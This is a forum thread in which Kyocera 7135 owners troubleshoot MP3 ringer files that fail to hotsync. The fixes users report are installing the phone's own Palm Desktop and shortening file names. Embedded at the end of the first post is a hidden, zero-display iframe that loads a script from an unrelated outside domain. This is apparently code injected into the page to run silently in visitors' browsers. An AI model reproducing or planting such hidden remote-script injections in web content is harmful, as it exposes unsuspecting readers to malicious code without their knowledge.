+ Reply to Thread

MP3 Ringer Frustration Invalid File Deleted

I have read the FAQs and this thread on "Problems Creating MP3 Ringers" but have found no answers.

I continue to get "Invalid Handheld File Deleted" each time I try to create a ringer and hotsync it into my phone. I have reset and done it all. No luck.

I followed the FAQs recommendation to the letter. Is the size limited? Anyone figure out why its doing this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Are you sure you're starting with a valid mp3 file? Where are you getting your mp3 from? I make mine myself in Sound Forge or Cool Edit Pro and I haven't had any trouble getting mp3 ringers to work.

Re: MP3 Ringer Frustration Invalid File Deleted

Originally posted by HuskerOne
    I have read the FAQs and this thread on "Problems Creating MP3 Ringers" but have found no answers.

I continue to get "Invalid Handheld File Deleted" each time I try to create a ringer and hotsync it into my phone. I have reset and done it all. No luck.

I followed the FAQs recommendation to the letter. Is the size limited? Anyone figure out why its doing this?
    Attach the original MP3 to this thread (or PM me and I'll give you my private email to send it to) and I'll see if I can figure out what is wrong. I have had no problem making MP3 ringers, so like jazmaan said, it might be a problem with your original MP3.

Alan

There are a few MP3 ringers on this site at 7135 Files Section. I've tried one and it worked fine.

ah

Going to try one more thing

The instructions are pretty clear. I don't think its the MP3, because I'm getting the same result from the ones on this website.

I'm going to try a hard reset and before I hotsync the rest of my applications, etc..... I will try a new ringer.

I will let you know if that does't work.

Thanks

o.k. I'm a moron

Before I did the hard reset, I started thinking. Had I skip the downloading of the palm software that came with the 7135?

Turned out I had and was using really old Palm desktop for a Vx.

Works great now. What an idiot?

Other than implementing the 7135-specific features, what does one get by installing the 7135-version of Palm Desktop? Is it a variation of Desktop 4.1?

Don't know

I don't know what specific features of the software might be different, but the software that I was using was pretty darn old probably 4 yrs.

All I know is that the only thing I did differently was install the 7135 desktop version that came with the phone and it works great.

Originally posted by jsimonson0
    Other than implementing the 7135-specific features, what does one get by installing the 7135-version of Palm Desktop? Is it a variation of Desktop 4.1?
    It appears to be identical to 4.1 from the visible features.

Alan

Re: MP3 Ringer Frustration Invalid File Deleted

Originally posted by HuskerOne

I followed the FAQs recommendation to the letter. Is the size limited? Anyone figure out why its doing this?
    I am having the same problem. When I first received my 7135 I followed all instructions and installed the 7135 Desktop, but did not remove the previous version that I was using with my Palm 505. All other programs seem to be working fine.

After reading your experience I proceded to remove the previous palm 505 desktop, and anything pertinent to it. I also removed the 7135 desktop and all programs originally installed. Rebooted and did a new installation. Sync my device to overwrite Outlook data, and it did. Again everything else seems to be working, but this error persist.

Does anyone know if after doing all this I may have to do a hard reset (I did a soft reset) ?, or what else could be happening?

FYI I am able to download MP3's with no problem, and also was able to download the rings that were posted on this site, except for Austin Powers, saw the format and tried using the ring program to install it, no go.

Thank you

Kyo MP3-Ringer Maker

OK, I have this program installed on my desktop. Whenever I open it and hit open file, sound type: ringer, max KB 100....and press create...nothing seems to happen at all

Please help!

I have no idea how it works exactly, as I don't have a 7135 yet; but one thing I would check is to see if it is piutting the converted mp3s in the app directory in program files, or the directory where it is installed, or maybe some subdirectory under that one.

Jorge

Re: Kyo MP3-Ringer Maker

It just so happens that I am creating some ringers right now. When you have selected your mp3 file and hit create ( I
    Used the "wild" card option), the program should create a new entry entitled xxx.mp3.pdb in the same folder that your mp3 file resides in. You can then copy that to your install folder or use the chooser in the hotsync install tool to select the file for install. After you hotsync, then reset your palm and your ringers will be availble to choose from. Hope that helps.

Seth

Originally posted by ari1979
    OK, I have this program installed on my desktop. Whenever I open it and hit open file, sound type: ringer, max KB 100....and press create...nothing seems to happen at all

Please help!

Hmm...

got this error msg when synching the mp3.pdb file:

HotSync operation started 01/14/03 12:04:21
    - Invalid handheld file deleted: Crogram FilesPalmFleishAInstallPAULOA~1.PDB
    OK Install with 1 message(s)

Check the FAQ and see if that helps. shortening the file name before converting can help you here.

Also, use the search feature.

It worked. Thank you Hotsync, you were absolutely right. I followed the instructions you posted in faq (stayed up till 3:00 am), using both methods and it did it. Renaming the MP3 file to seven characters or less did the trick for me. I also learned how to edit the MP3 file. Thanks again.